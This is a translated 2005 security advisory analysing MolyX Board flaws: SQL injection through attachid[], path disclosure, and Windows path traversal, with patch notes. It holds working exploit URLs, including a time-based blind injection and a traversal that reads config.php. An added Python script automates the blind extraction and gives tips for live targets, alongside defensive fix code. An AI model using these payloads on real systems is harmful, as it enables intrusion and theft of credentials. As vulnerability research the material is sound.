MolyX vulnerability analysis - vulnerability warning - Black Bar Security Net (黑吧安全网)

2005-09-25 00:00:00
佚名 (Anonymous)
www.myhack58.com
Text: SuperHei / Security Angel [S4T], 2005.09.21

Preamble:
MolyX Board (hereinafter MXB) is a PHP forum program developed by MolyX Studios, which appears to be the former CNVBB team. MXB borrows the strengths of many forum programs and is powerful, and years of experience finishing and improving forum software also make MXB fit users' habits well. Vulnerabilities, however, are unavoidable.

Tested version:
MolyX BOARD 2.5.0-Beta1

  1. usercp.php vulnerability

When attachments are deleted, the attachid[] variable is not filtered, which leads to absolute path disclosure and a SQL injection vulnerability. The analysis follows.

Code, lines 397-407:

$affected_ids = count($_INPUT['attachid']);
if ( $affected_ids > 0 ) {
    // attachid[] elements are joined with commas and spliced unquoted into IN (...)
    $attachments = $DB->query("SELECT a.*, p.threadid, p.pid
        FROM ".TABLE_PREFIX."attachment a
        LEFT JOIN ".TABLE_PREFIX."post p ON ( a.postid=p.pid )
        WHERE a.attachmentid IN (".implode(",",$_INPUT['attachid']).")
        AND a.userid='".$bbuserinfo['id']."'");
    if ( $attachment = $DB->fetch_array($attachments) ) {
        if ( $attachment['location'] ) {
            @unlink( $bboptions['uploadfolder']."/".$attachment['attachpath']."/".$attachment['location'] );
        }

We can see that attachid[] reaches the database query via $_INPUT['attachid']. Looking at where $_INPUT comes from, global.php line 23:

$_INPUT = $forums->func->init_variable();

Following init_variable(), its code in includes/functions.php is:

function init_variable()
{
    $return = array();
    foreach ( array($_GET, $_POST) AS $type ) {
        if ( is_array($type) ) {
            foreach ( $type AS $k => $v ) {
                if ( is_array($type[$k]) ) {
                    foreach ( $type[$k] AS $k1 => $v1 ) {
                        $return[ $this->clean_key($k) ][ $this->clean_key($k1) ] = $this->clean_value($v1);
                    }
                } else {
                    $return[ $this->clean_key($k) ] = $this->clean_value($v);
                }
            }
        }
    }
    return $return;
}

function clean_key($key)
{
    if ($key == "") return "";
    return preg_replace( array("/\.\./", "/\_\_(.+?)\_\_/", "/^([\w\.\-\_]+)$/"), array("", "", "$1"), $key );
}

function clean_value($val)
{
    if ($val == "") return "";

    $pregfind    = array ( "&#032;", "&",     "<!--",         "-->" );
    $pregreplace = array ( " ",      "&amp;", "&#60;&#33;--", "--&#62;" );
    $val = str_replace($pregfind, $pregreplace, $val);

    $val = preg_replace( "/<script/i", "&#60;script", $val );

    $pregfind    = array ( ">",    "<",    "\"",     "!",     "'" );
    $pregreplace = array ( "&gt;", "&lt;", "&quot;", "&#33;", "&#39;" );
    $val = str_replace($pregfind, $pregreplace, $val);

    $pregfind    = array ( "/\n/",    "/\\$/",   "/\r/" );
    $pregreplace = array ( "<br />", "&#036;", "" );
    $val = preg_replace($pregfind, $pregreplace, $val);

    if ( $this->allow_unicode ) {
        $val = preg_replace("/&amp;#([0-9]+);/s", "&#\\1;", $val );
    }
    if ( get_magic_quotes_gpc() ) {
        $val = stripslashes($val);
    }
    return preg_replace( "/\\\\(?!&amp;#|\?#)/", "&#092;", $val );
}

So it entity-encodes & < > \ ' " ! and <script and similar characters. Note what it leaves alone: parentheses, commas, =, digits, spaces and SQL keywords pass through untouched, and the attachid[] values are spliced unquoted into the IN (...) clause, so this filter does nothing against the injection above.

Exploitation:

Because the result of the vulnerable query is never output to the page, we cannot use UNION to get data out directly, and, damn it (tnnd), by default only administrators get to see the MySQL error message: db_mysql.php lines 141-147:

if ($bbuserinfo['usergroupid']==4) {
    $the_error = @mysql_error($this->connection_id);
} else {
    $the_error = "";
}
$message = "database error: \n\n";
$message .= $the_error."\n\n";

So ordinary users get no error message back; 1=1 and 1=2 return the same page, so the "classic injection" tricks cannot be used here.
Fortunately, we have benchmark().

Note: the statement cannot contain & < > and the like, so the injection is built as follows (the 0x.. hex literals avoid the filtered single quote, "and" stands in for the filtered &&, and the trailing /* comments out the "AND a.userid='...'" part of the query):

http://127.0.0.1/xx/uploads/usercp.php?s=&do=attach&sort=&attachid[]=1) and if((ascii(substring(user(),1,1))=0x72)|0,benchmark(100000,md5(0x41)),0)/*

If the response is delayed, the first character of user() has the hex value 0x72, i.e. the letter r. Note that only = can be used for the comparison, because < and > are filtered. :)
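The time-based extraction described above, written out as an added example (not the article's or MolyX's code). It ports the character rewrites of clean_value() from the PHP above to check what survives filtering, builds the quote-free attachid[] payload, drives the byte-by-byte loop against a timing oracle, and, since it has no target to talk to, uses a constructed offline oracle that parses the comparison out of the payload and returns the delay benchmark() would have produced. The secret "root@localhost" and the intval()-style fix at the end are assumptions for illustration, not the official patch.

```python
import re

# Rewrites MXB's clean_value() applies to every GET/POST value, ported from the
# PHP above so we can see what a payload looks like after filtering. Order
# matters: '&' is encoded first so later entities are not double-encoded, and
# '<script' is handled before '<'.
def clean_value(val: str) -> str:
    if val == "":
        return ""
    for find, repl in (("&", "&amp;"), ("<!--", "&#60;&#33;--"), ("-->", "--&#62;")):
        val = val.replace(find, repl)
    val = re.sub(r"<script", "&#60;script", val, flags=re.IGNORECASE)
    for find, repl in ((">", "&gt;"), ("<", "&lt;"), ('"', "&quot;"),
                       ("!", "&#33;"), ("'", "&#39;")):
        val = val.replace(find, repl)
    for find, repl in (("\n", "<br />"), ("$", "&#036;"), ("\r", "")):
        val = val.replace(find, repl)
    # allow_unicode / magic_quotes branches omitted; the final step encodes
    # user-supplied backslashes (simplified here to every backslash).
    return val.replace("\\", "&#092;")


def build_payload(pos: int, byte: int, loops: int = 100000) -> str:
    """attachid[] value testing whether byte `pos` of user() equals `byte`.

    The value lands unquoted inside "IN (...)", so no quote is needed to break
    out; 0x.. hex literals avoid the filtered single quote; '=' is the only
    comparison left once < and > are entity-encoded; 'and' replaces the
    filtered '&&'; the trailing /* comments out "AND a.userid='...'".
    """
    return (f"1) and if((ascii(substring(user(),{pos},1))=0x{byte:02x})|0,"
            f"benchmark({loops},md5(0x41)),0)/*")


def extract_by_timing(oracle, max_len: int = 64, threshold: float = 0.5) -> str:
    """Recover user() one byte at a time. `oracle(payload)` returns the seconds
    the request took; a delay above `threshold` means the comparison was true."""
    recovered = []
    for pos in range(1, max_len + 1):
        # MySQL: substring() past the end is '' and ascii('') is 0, so a match
        # on 0x00 marks the end of the string.
        if oracle(build_payload(pos, 0)) >= threshold:
            break
        for byte in range(0x20, 0x7F):
            if oracle(build_payload(pos, byte)) >= threshold:
                recovered.append(chr(byte))
                break
        else:
            raise RuntimeError(f"no printable byte matched at position {pos}")
    return "".join(recovered)


_PAYLOAD_RE = re.compile(r"substring\(user\(\),(\d+),1\)\)=0x([0-9a-f]{2})\)")

def make_offline_oracle(secret: str, slow: float = 1.0, fast: float = 0.0):
    """Constructed stand-in for the forum (no network): filters the value the
    way clean_value() would, parses the comparison out of it, and returns the
    delay benchmark() would have caused if the comparison were true."""
    def oracle(payload: str) -> float:
        m = _PAYLOAD_RE.search(clean_value(payload))
        if m is None:          # filtering mangled the payload: no delay
            return fast
        pos, byte = int(m.group(1)), int(m.group(2), 16)
        actual = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return slow if actual == byte else fast
    return oracle


def intval_like(value: str) -> int:
    """PHP intval() on a string: leading integer, otherwise 0."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def safe_in_clause(ids) -> str:
    """The usual fix for this bug class (assumed, not the official patch):
    cast every attachid[] element to an integer before splicing it into SQL."""
    return "IN (" + ",".join(str(intval_like(v)) for v in ids) + ")"


if __name__ == "__main__":
    oracle = make_offline_oracle("root@localhost")   # constructed secret
    print(extract_by_timing(oracle))                 # root@localhost
    print(safe_in_clause([build_payload(1, 0x72)]))  # IN (1)
```

Against a live target, `oracle` would time an HTTP request carrying the payload as attachid[]; the threshold should be set from a few baseline requests, since benchmark(100000, md5(...)) is tuned for 2005-era hardware and may need a larger loop count to stand out from network jitter.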

When $_INPUT['attachid'] is submitted as an ordinary variable instead of an array, count() still returns 1 for a scalar in this PHP version, so implode() is reached with a non-array, errors out, and discloses the physical path.
Submit:
http://127.0.0.1/xx/uploads/usercp.php?s=&do=attach&sort=&attachid

Returns: Warning: implode(): Bad arguments. in f:\www\www\xx\uploads\usercp.php on line 402

Patch:
The official patch came out on 2005.09.20: http://www.molyx.com/attachment.php?id=3097&u=2&EXT=txt&attach=1127146647.attach&filename=UPDATE_20050920.txt&attachpath=2
Worth mentioning: the patch fixes two vulnerabilities at once; the other is in private.php, where $_INPUT['pmid'] is not filtered strictly enough. Its exploitation and analysis are much the same as above, so I won't go into it; interested readers can look for themselves. (ps: the private.php vulnerability was not found by me; I guess the officials found it when they looked at my test logs.)

  2. attachment.php vulnerability
    Affected system: Windows

This vulnerability was actually patched once before: http://4ngel.net/article/50.htm. But angel's article has a small error: it does not filter \ and ..\, so on a Windows host the vulnerability remains. For the analysis see angel's article; the exploit:

http://www.xxx.com/attachment.php?id=684&u=3096&extension=gif&attach=.\..\..\..\..\..\..\includes\config.php&filename=1.gif

This retrieves the contents of includes/config.php.

Fix: filter .., / and \.
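The traversal check the fix calls for, as an added example (not MXB's code and not a quote of the 4ngel.net patch). It contrasts a hypothetical filter that strips only the forward-slash form "../" with two checks that cover the backslash form as well: a separator-agnostic test for a ".." path component, and a Windows-style normalisation that refuses anything resolving outside the upload folder. The root f:\www\www\xx\uploads is taken from the warning message above and assumed to be $bboptions['uploadfolder']; the attachment name 2\1127146647.attach is assumed from the patch URL.

```python
import ntpath
import re
from typing import Optional

# Assumed upload folder: the path disclosed by the implode() warning above.
UPLOAD_ROOT = r"f:\www\www\xx\uploads"


def weak_filter(attach: str) -> str:
    """Hypothetical earlier fix: strip the forward-slash parent reference only.
    Stands in for the gap the article describes (no handling of \\ and ..\\);
    it is not a quote of the earlier patch."""
    return attach.replace("../", "")


def has_traversal(attach: str) -> bool:
    """Separator-agnostic check: any '..' component, splitting on '/' or '\\'."""
    return ".." in re.split(r"[\\/]+", attach)


def resolve_under_root(attach: str, root: str = UPLOAD_ROOT) -> Optional[str]:
    """Windows-style normalisation (ntpath is pure string handling and works on
    any host), then a prefix check: the joined path must stay below root."""
    root_n = ntpath.normpath(root).lower()
    full = ntpath.normpath(ntpath.join(root, attach))
    if full.lower() != root_n and not full.lower().startswith(root_n + "\\"):
        return None
    return full


def check_attach(attach: str, root: str = UPLOAD_ROOT) -> Optional[str]:
    """Both checks together: reject '..' components, then confine to root.
    Returns the path to open, or None if the request must be refused."""
    if has_traversal(attach):
        return None
    return resolve_under_root(attach, root)


if __name__ == "__main__":
    exploit = r".\..\..\..\..\..\..\includes\config.php"   # from the article
    print(weak_filter(exploit) == exploit)       # True: ..\ passes untouched
    print(check_attach(exploit))                 # None
    print(check_attach(r"2\1127146647.attach"))  # f:\www\www\xx\uploads\2\1127146647.attach
```

The normalisation step is the one that matters: single-pass stripping can be undone by nesting (stripping "../" from "....//" leaves "../"), whereas comparing the resolved path against the root is independent of how the traversal was spelled.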

Thank you for reading!